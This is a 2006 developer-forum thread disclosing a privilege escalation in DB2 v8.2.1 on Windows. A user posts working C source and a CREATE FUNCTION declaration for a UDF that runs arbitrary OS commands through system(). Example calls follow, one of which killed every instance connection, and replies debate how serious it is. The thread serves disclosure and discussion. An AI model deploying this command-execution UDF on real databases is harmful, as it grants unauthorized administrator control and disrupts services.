473,382 Members | 1,651 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > db2 database > questions > security issue with system call from c udf on windows

Join Bytes to post your question to a community of 473,382 software developers and data experts.

Security issue with system call from C udf on Windows

Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.

Nov 30 '06 #1
3 1848
In article <11*********************@h54g2000cwb.googlegroups. com>,
4.****@mail.ru says...
Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.

You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
Nov 30 '06 #2
You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
But I can have rights to put module anywhere in the LIBPATH or PATH of
the instance owner or use absolute path for registering.
In the last case it will be enough to find any path in the server where
administrator has rights to read and I have rights to write...

Nov 30 '06 #3
4.****@mail.ru wrote:
Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?
I guess that's a very good example illustrating that the DBA should really
take care of privileges and who is allowed to created what kind of objects.
Your UDF directly exposes capabilities of the OS through SQL. You could
achieve the same with a different, more obfuscated UDF as well.

--
Knut Stolze
DB2 Information Integration Development
IBM Germany
Nov 30 '06 #4
New Post

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

2
Security Warnings From FXCop - CA2122 & CA2123
by: orekinbck | last post by:
Hi There I am inheriting from DateTimePicker class to create a DateTimePicker control with a configurable back colour. I got the original code from http://dotnet.mvps.org/ then converted it to...
C# / C Sharp
29
Security- access to Event Viewer
by: Patrick | last post by:
I have the following code, which regardless which works fine and logs to the EventViewer regardless of whether <processModel/> section of machine.config is set to username="SYSTEM" or "machine" ...
ASP.NET
19
Security.Exception
by: Diego F. | last post by:
I think I'll never come across that error. It happens when running code from a DLL that tries to write to disk. I added permissions in the project folder, the wwwroot and in IIS to NETWORK_SERVICE...
ASP.NET
1
ASP.NET and COM interop/security issue.. ('NullReferenceException')
by: Subrata | last post by:
hi All, I'm trying to call a COM component written in PowerBuilder from an ASP.NET application. The first method call into the COM component (developed using PB) is failing with 'Object reference...
ASP.NET
0
Security issue running unmanaged code in a win form ctrl hosted in
by: Filippo Bettinaglio | last post by:
Security problem running unmanaged code (.ocx control) in a windows from control hosted in IE6 Hi, I have design a windows from control which contain a .OCX in one of its forms....
.NET Framework
5
An unhandled exception of type 'System.Security.SecurityException' occurred in mscorlib.dll Additional information: Requested registry access is not allowed.
by: Ankit Aneja | last post by:
This is my problem. I am using Visual 2003, .Net framework 1.1 and the Application Block I configured the DAAB using the Enterprise Library Configuration now this is the error which is coming ...
ASP.NET
0
Embedded .net Windows Forms Control Security Issue
by: gxl034000 | last post by:
Hi, I have been trying to use a .net Forms control in my webpage to open up an application(notepad) on the client. The control works fine when embedded in a windows form, but I keep getting a...
ASP.NET
3
Security issue in .NET 2.0 app on Network drive
by: =?Utf-8?B?dG9ieQ==?= | last post by:
Our company deploys our .NET 2.0 apps to a network drive for them to be run. We are having issues with security in getting these to run. Below is a sample output for a job that is trying to call a...
.NET Framework
0
.Net 2.0 issue with HttpWebRequest/Proxy breaking WebService
by: =?Utf-8?B?TGFycnlLdXBlcm1hbg==?= | last post by:
Our WebDev team is experiencing a problem when trying to access a WebService using SSL and through a proxy server after using the HttpWebRequest object. Under normal circumstances we are able to...
.NET Framework
1
Cloud Servers without Credit Card and Email Registration: A Simpler Way to Get on the Cloud
by: CloudSolutions | last post by:
Introduction: For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
General
0
Wordpress or something else?
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...
Content Management Systems
0
Easy Steps to Fix "Canon Printer Won't Connect to WiFi Network"
by: taylorcarr | last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
General
0
Basic Javascript concepts
by: aa123db | last post by:
Variable and constants Use var or let for variables and const fror constants. Var foo ='bar'; Let foo ='bar';const baz ='bar'; Functions function $name$ ($parameters$) { } ...
Javascript
0
Batch import of multiple excel files into the database
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
Data Management
0
Merging data from multiple Excel files
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
Data Management
0
Migrating Website to Cloud - Emmanuel Katto
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
How to build RAID in BIOS?
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
Computer Hardware

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!